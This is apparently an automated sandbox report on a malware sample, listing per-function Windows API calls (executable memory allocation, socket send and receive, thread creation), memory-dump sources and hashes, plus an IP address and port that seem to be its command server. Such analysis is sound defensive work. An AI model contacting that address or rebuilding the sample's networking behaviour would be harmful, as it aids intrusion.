                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                  • String ID:
                                                                                                  • API String ID: 800915452-0
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64), ref: 02D09ADC
                                                                                                  • GdiplusStartup.GDIPLUS(02D2FB60,?,?), ref: 02D09B15
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64), ref: 02D09B26
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 389129658-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: 8.217.85.20$9091
                                                                                                  • API String ID: 3472027048-631352039
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 02D0F969
                                                                                                    • Part of subcall function 02D13DE2: GetLastError.KERNEL32(00000001,00000000,02D0F920,02D0F6FC,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D13DE6
                                                                                                    • Part of subcall function 02D13DE2: ___set_flsgetvalue.LIBCMT ref: 02D13DF4
                                                                                                    • Part of subcall function 02D13DE2: __calloc_crt.LIBCMT ref: 02D13E08
                                                                                                    • Part of subcall function 02D13DE2: DecodePointer.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13E22
                                                                                                    • Part of subcall function 02D13DE2: GetCurrentThreadId.KERNEL32 ref: 02D13E38
                                                                                                    • Part of subcall function 02D13DE2: SetLastError.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13E50
                                                                                                  • __freeptd.LIBCMT ref: 02D0F973
                                                                                                    • Part of subcall function 02D13FA6: TlsGetValue.KERNEL32(?,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FC7
                                                                                                    • Part of subcall function 02D13FA6: TlsGetValue.KERNEL32(?,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FD9
                                                                                                    • Part of subcall function 02D13FA6: DecodePointer.KERNEL32(00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FEF
                                                                                                    • Part of subcall function 02D13FA6: __freefls@4.LIBCMT ref: 02D13FFA
                                                                                                    • Part of subcall function 02D13FA6: TlsSetValue.KERNEL32(00000027,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D1400C
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F97C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4224061863-0
                                                                                                  • Opcode ID: 2724e5c2700f713393ca01cb1d1fa8083a8d834bd76ca7655ed9195569bfad4b
                                                                                                  • Instruction ID: 26da360c72ab7463584a4421ed6b4a6a2c0a8a51df23680d90786dc52b529026
                                                                                                  • Opcode Fuzzy Hash: 2724e5c2700f713393ca01cb1d1fa8083a8d834bd76ca7655ed9195569bfad4b
                                                                                                  • Instruction Fuzzy Hash: A1C04C214443457F9B643771A90DA1A3A5EDED0350B654460BC0585B90DE75DC51C9A0
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 0097715B
                                                                                                    • Part of subcall function 00979896: GetLastError.KERNEL32(00000001,00000000,00977112,00976F0C,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 0097989A
                                                                                                    • Part of subcall function 00979896: ___set_flsgetvalue.LIBCMT ref: 009798A8
                                                                                                    • Part of subcall function 00979896: __calloc_crt.LIBCMT ref: 009798BC
                                                                                                    • Part of subcall function 00979896: DecodePointer.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 009798D6
                                                                                                    • Part of subcall function 00979896: GetCurrentThreadId.KERNEL32 ref: 009798EC
                                                                                                    • Part of subcall function 00979896: SetLastError.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 00979904
                                                                                                  • __freeptd.LIBCMT ref: 00977165
                                                                                                    • Part of subcall function 00979A58: TlsGetValue.KERNEL32(?,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979A79
                                                                                                    • Part of subcall function 00979A58: TlsGetValue.KERNEL32(?,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979A8B
                                                                                                    • Part of subcall function 00979A58: DecodePointer.KERNEL32(00000000,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979AA1
                                                                                                    • Part of subcall function 00979A58: __freefls@4.LIBCMT ref: 00979AAC
                                                                                                    • Part of subcall function 00979A58: TlsSetValue.KERNEL32(00000025,00000000,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979ABE
                                                                                                  • ExitThread.KERNEL32 ref: 0097716E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4224061863-0
                                                                                                  • Opcode ID: adaf7ed63ff1584fce545b7ac8fa31d89d2c64eb1dc9d0dde25c5ce84baf2482
                                                                                                  • Instruction ID: cb0fb9f62386b5522bca4ffa94e07e59b37b46bd3e366bce92f3e3bfc437e713
                                                                                                  • Opcode Fuzzy Hash: adaf7ed63ff1584fce545b7ac8fa31d89d2c64eb1dc9d0dde25c5ce84baf2482
                                                                                                  • Instruction Fuzzy Hash: BCC08C32008A086ACA1077768C0EA4A3A4DCAC1310B918010B90C86111DE20D8008251
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0282022B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                  • Instruction ID: 189435d4d200edbc8bac22bc817bb7e33be7d980016b9458f6e301f0ff4c07a3
                                                                                                  • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                  • Instruction Fuzzy Hash: 6AA17078A0062AEFCB14CFA9C984AADB7F1FF58308F148169E419DB751D730E995CB90
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Time_memmovetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1463837790-0
                                                                                                  • Opcode ID: 931c8211f04cd79a80f10d84b23818fecf7e59914b77466278ebf48adf7b6931
                                                                                                  • Instruction ID: 17326e1d5b165f733ccc4f8414701e34001a20e72dc9a4a57b2fc6390e5f3caa
                                                                                                  • Opcode Fuzzy Hash: 931c8211f04cd79a80f10d84b23818fecf7e59914b77466278ebf48adf7b6931
                                                                                                  • Instruction Fuzzy Hash: E751B0727006019FD755DF69C8C0B6AB7A6FF88314B1486ACE9598B7A0DB31FC51CBA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time_memmovetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1463837790-0
                                                                                                  • Opcode ID: 5177ee9fad7bf00bcfd49d11bd16f64d52456b46d700af4c2f2ce024a3f7eeed
                                                                                                  • Instruction ID: f72ca033bbd8859eacf2afbf1abd50e1fbd54d72b95b0a8deb1471a14ae0ebea
                                                                                                  • Opcode Fuzzy Hash: 5177ee9fad7bf00bcfd49d11bd16f64d52456b46d700af4c2f2ce024a3f7eeed
                                                                                                  • Instruction Fuzzy Hash: 1951BC73700201AFD729CF69C8C0A6AB7A9BF84314714C66CE91E8B711EB31ED41DB90
                                                                                                  APIs
                                                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02D03043
                                                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 02D03064
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexitrecvselect
                                                                                                  • String ID:
                                                                                                  • API String ID: 4248608111-0
                                                                                                  • Opcode ID: 8a19711ad44b903bf0d3130a19aba99ced214104123afaf26c7abb48f9205b60
                                                                                                  • Instruction ID: 9bd82284c5b7219062014264f50ecaf001e663c7c4542803eac9b642d54153ac
                                                                                                  • Opcode Fuzzy Hash: 8a19711ad44b903bf0d3130a19aba99ced214104123afaf26c7abb48f9205b60
                                                                                                  • Instruction Fuzzy Hash: DF219E70A012089FDB709F69DCC8F9A77A5EF44314F2445E5E904AB3E0DBB1AD84CBA1
                                                                                                  APIs
                                                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00973023
                                                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 00973044
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexitrecvselect
                                                                                                  • String ID:
                                                                                                  • API String ID: 4248608111-0
                                                                                                  • Opcode ID: 411c3d15a60393f4d668f5fad58499e8cc94e9e8491f62d582cdc01a159490ed
                                                                                                  • Instruction ID: f0c4a06b293461403ca144a110c2636c8b12dfcda878946d4a616904210a81f4
                                                                                                  • Opcode Fuzzy Hash: 411c3d15a60393f4d668f5fad58499e8cc94e9e8491f62d582cdc01a159490ed
                                                                                                  • Instruction Fuzzy Hash: F621B772508208DFDB20DF68DC8AB9A7778EF45310F10C1A4E51DAB291D770EE84DBA1
                                                                                                  APIs
                                                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 02D03291
                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 02D032CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: send
                                                                                                  • String ID:
                                                                                                  • API String ID: 2809346765-0
                                                                                                  • Opcode ID: 4e47ba113688258ebec6030bdbdd95f804f18df24e9ff81ed2e922bdec4c604c
                                                                                                  • Instruction ID: 60ddebc4666f8d03b0c642ff26d8370fced3837f0093e55b69743f8de6421af9
                                                                                                  • Opcode Fuzzy Hash: 4e47ba113688258ebec6030bdbdd95f804f18df24e9ff81ed2e922bdec4c604c
                                                                                                  • Instruction Fuzzy Hash: E111C272A02244ABC7A08A7ADDC8B5E7799FB49368F1180A5F908D73E0D2709D418654
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: SleepTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 346578373-0
                                                                                                  • Opcode ID: 0c588458ae85b2379ea734a634d0ca0b6c3107530913bd445182bebb0a670d85
                                                                                                  • Instruction ID: 05aa5690f13fb757c886be2d997f3af5a1905d613e50bff8acb2dc237a209de6
                                                                                                  • Opcode Fuzzy Hash: 0c588458ae85b2379ea734a634d0ca0b6c3107530913bd445182bebb0a670d85
                                                                                                  • Instruction Fuzzy Hash: CD01BC31600206AFD311CF28C8C8B69B7A5FB99305F1442A8E504872E0C771ADD6C7E2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SleepTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 346578373-0
                                                                                                  • Opcode ID: 81fc066a513274fbb4f965cfc2d01c7014fbc63d6b5f46bff011614cfef8b07d
                                                                                                  • Instruction ID: d969e492cc14ca13b579c2d6f5702353dbf4f83d2388e913b93d75fb64ea799c
                                                                                                  • Opcode Fuzzy Hash: 81fc066a513274fbb4f965cfc2d01c7014fbc63d6b5f46bff011614cfef8b07d
                                                                                                  • Instruction Fuzzy Hash: B601B132704609AFD710DF29D8C8BA9B3A9FB99305F54C228D1088B690C771AE85D7D1
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,02D0E04E,00000000,02D09800,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D0CD1B
                                                                                                  • _free.LIBCMT ref: 02D0CD56
                                                                                                    • Part of subcall function 02D01280: __CxxThrowException@8.LIBCMT ref: 02D01290
                                                                                                    • Part of subcall function 02D01280: DeleteCriticalSection.KERNEL32(00000000,02D0D3E6,02D26624,?,?,02D0D3E6,?,?,?,?,02D25A40,00000000), ref: 02D012A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1116298128-0
                                                                                                  • Opcode ID: 4b0059f392af51ddbab69f7208bb92942569decb7befc70f1a5564aea5914a77
                                                                                                  • Instruction ID: 2d97bcfd1b492e31d0073c1e8b3584586a57536df039b0920aa416f114dd6328
                                                                                                  • Opcode Fuzzy Hash: 4b0059f392af51ddbab69f7208bb92942569decb7befc70f1a5564aea5914a77
                                                                                                  • Instruction Fuzzy Hash: D3017EB0A00B408FC330CF6A9884A07FAF9FF98700B504A1EE6DAC6B60D370A505CF65
                                                                                                  APIs
                                                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,00975AF2), ref: 0097642B
                                                                                                  • _free.LIBCMT ref: 00976466
                                                                                                    • Part of subcall function 00971280: __CxxThrowException@8.LIBCMT ref: 00971290
                                                                                                    • Part of subcall function 00971280: DeleteCriticalSection.KERNEL32(00000000,?,00987E78), ref: 009712A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1116298128-0
                                                                                                  • Opcode ID: 7bc1de64ee48850c6b267b685a624aa7e4565570074210ed75badfd58582e283
                                                                                                  • Instruction ID: aead62755967af27577d46b936f450188b43dccc5bb4dff7a37c3572ffe8730f
                                                                                                  • Opcode Fuzzy Hash: 7bc1de64ee48850c6b267b685a624aa7e4565570074210ed75badfd58582e283
                                                                                                  • Instruction Fuzzy Hash: 8F017AF1A00B408FD7219F6A9844A07FAF8BF98710B108A1EE2DAC7B20D370A445CF95
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,02D0DF10,00000000,00000000,00000000), ref: 02D0E49B
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02D11168,?,?,?,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D0E4A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateObjectSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1891408510-0
                                                                                                  • Opcode ID: f38f42fe1f0ead332c1deb9bbca8a75af6736b2eebb966bb8e239eed16e049e0
                                                                                                  • Instruction ID: 511d92d8cb5c54c1471606c6b502b1f0671bd473a091ffe6e2c382e8234467ea
                                                                                                  • Opcode Fuzzy Hash: f38f42fe1f0ead332c1deb9bbca8a75af6736b2eebb966bb8e239eed16e049e0
                                                                                                  • Instruction Fuzzy Hash: DCE012B4984206BFEB109B54ECC9F7637ACE7183307108A25BD14C23D0D635DCA4CA60
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D0F98F
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                    • Part of subcall function 02D0F964: __getptd_noexit.LIBCMT ref: 02D0F969
                                                                                                    • Part of subcall function 02D0F964: __freeptd.LIBCMT ref: 02D0F973
                                                                                                    • Part of subcall function 02D0F964: ExitThread.KERNEL32 ref: 02D0F97C
                                                                                                  • __XcptFilter.LIBCMT ref: 02D0F9B0
                                                                                                    • Part of subcall function 02D1418F: __getptd_noexit.LIBCMT ref: 02D14195
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 418257734-0
                                                                                                  • Opcode ID: bc92f432496d7395d4d40f823eab2a640c98717188a1e750851860b8cf5cda37
                                                                                                  • Instruction ID: 61bb4ae00496d0648d42346b1965fca789a62f06b1abe7da2988940f270b86eb
                                                                                                  • Opcode Fuzzy Hash: bc92f432496d7395d4d40f823eab2a640c98717188a1e750851860b8cf5cda37
                                                                                                  • Instruction Fuzzy Hash: 2DE0B6B5940701BFEB18EBA0E845E7D776AEF44B01F204188E1026B7A0CA759D449E20
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 00977181
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                    • Part of subcall function 00977156: __getptd_noexit.LIBCMT ref: 0097715B
                                                                                                    • Part of subcall function 00977156: __freeptd.LIBCMT ref: 00977165
                                                                                                    • Part of subcall function 00977156: ExitThread.KERNEL32 ref: 0097716E
                                                                                                  • __XcptFilter.LIBCMT ref: 009771A2
                                                                                                    • Part of subcall function 00979C41: __getptd_noexit.LIBCMT ref: 00979C47
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 418257734-0
                                                                                                  • Opcode ID: fe81fca151e2e763f47355e786c42bf30913c8938eadaf5b48f48e0a83a306ca
                                                                                                  • Instruction ID: b5deae4bc2d81c6f2fdb63454dfc6b65e92b713507cee52c465f0cac38fc3b8b
                                                                                                  • Opcode Fuzzy Hash: fe81fca151e2e763f47355e786c42bf30913c8938eadaf5b48f48e0a83a306ca
                                                                                                  • Instruction Fuzzy Hash: D3E0ECB29046049FEB18FBA0C946F6D7B75EF84705F208048F1165B2B2DA759940DB24
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 02D1641B
                                                                                                    • Part of subcall function 02D18E5B: __mtinitlocknum.LIBCMT ref: 02D18E71
                                                                                                    • Part of subcall function 02D18E5B: __amsg_exit.LIBCMT ref: 02D18E7D
                                                                                                    • Part of subcall function 02D18E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,02D13F06,0000000D,02D26340,00000008,02D13FFF,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?), ref: 02D18E85
                                                                                                  • __tzset_nolock.LIBCMT ref: 02D1642C
                                                                                                    • Part of subcall function 02D15D22: __lock.LIBCMT ref: 02D15D44
                                                                                                    • Part of subcall function 02D15D22: ____lc_codepage_func.LIBCMT ref: 02D15D8B
                                                                                                    • Part of subcall function 02D15D22: __getenv_helper_nolock.LIBCMT ref: 02D15DAD
